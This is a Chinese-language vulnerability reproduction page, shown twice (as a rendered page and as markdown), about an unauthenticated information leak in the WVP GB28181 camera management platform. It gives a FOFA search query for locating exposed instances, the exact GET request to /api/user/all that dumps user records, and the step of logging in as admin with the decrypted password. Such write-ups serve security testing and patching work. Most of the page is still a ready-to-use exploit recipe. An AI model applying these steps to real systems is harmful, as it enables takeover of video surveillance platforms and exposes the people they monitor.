fofamini-wiki

登录白背景

源码

GB28181摄像头管理平台WVP视频平台存在敏感信息泄露漏洞

一、产品简介

GB28181是中国国家标准中关于IP视频监控设备的标准之一。它规定了视频监控设备之间的通信协议和数据格式，以便实现设备之间的互联互通。GB28181摄像头管理平台则是用于管理和监控这些符合GB28181标准的摄像头设备的软件平台，GB28181摄像头管理平台在安防领域具有广泛的应用，可以用于监控各种场所，如公共交通、城市道路、企业园区等，提高了监控系统的整体效率和管理水平。GB28181摄像头管理平台api接口处存在未授权漏洞,恶意攻击者可以通过此漏洞获取到登录信息，从而登录到后台，使服务器处于不安全的状态

二、影响版本

WVP视频平台

三、资产测绘

body="国标28181"

四、漏洞复现

GET /api/user/all HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

使用admin/解密后的密码登录系统

原文: https://www.yuque.com/xiaokp7/ocvun2/gqt9d1wy8zy3r8oi

# GB28181摄像头管理平台WVP视频平台存在敏感信息泄露漏洞

# 一、产品简介
 GB28181是中国国家标准中关于IP视频监控设备的标准之一。它规定了视频监控设备之间的通信协议和数据格式，以便实现设备之间的互联互通。GB28181摄像头管理平台则是用于管理和监控这些符合GB28181标准的摄像头设备的软件平台，GB28181摄像头管理平台在安防领域具有广泛的应用，可以用于监控各种场所，如公共交通、城市道路、企业园区等，提高了监控系统的整体效率和管理水平。GB28181摄像头管理平台api接口处存在未授权漏洞,恶意攻击者可以通过此漏洞获取到登录信息，从而登录到后台，使服务器处于不安全的状态  ![image.png](./img/vhv8DMGLU3HVem8R/1715270773197-7403b852-9ccb-443d-aa6e-ec05f84c76bb-824468.png)

# 二、影响版本
 WVP视频平台

# 三、资产测绘
```
body="国标28181"
```
![image.png](./img/vhv8DMGLU3HVem8R/1715269904082-a474df98-5550-4823-95dc-5ce4290ea873-522852.png)

## 四、漏洞复现
```http
GET /api/user/all HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
```
![image.png](./img/vhv8DMGLU3HVem8R/1715269724994-d04cb343-8099-4450-8a81-ffe1ee1b9ea6-874489.png)使用admin/解密后的密码登录系统 ![image.png](./img/vhv8DMGLU3HVem8R/1715269814518-8be4d2fb-dd7a-4bab-8183-0fda67f3e1ae-979424.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gqt9d1wy8zy3r8oi>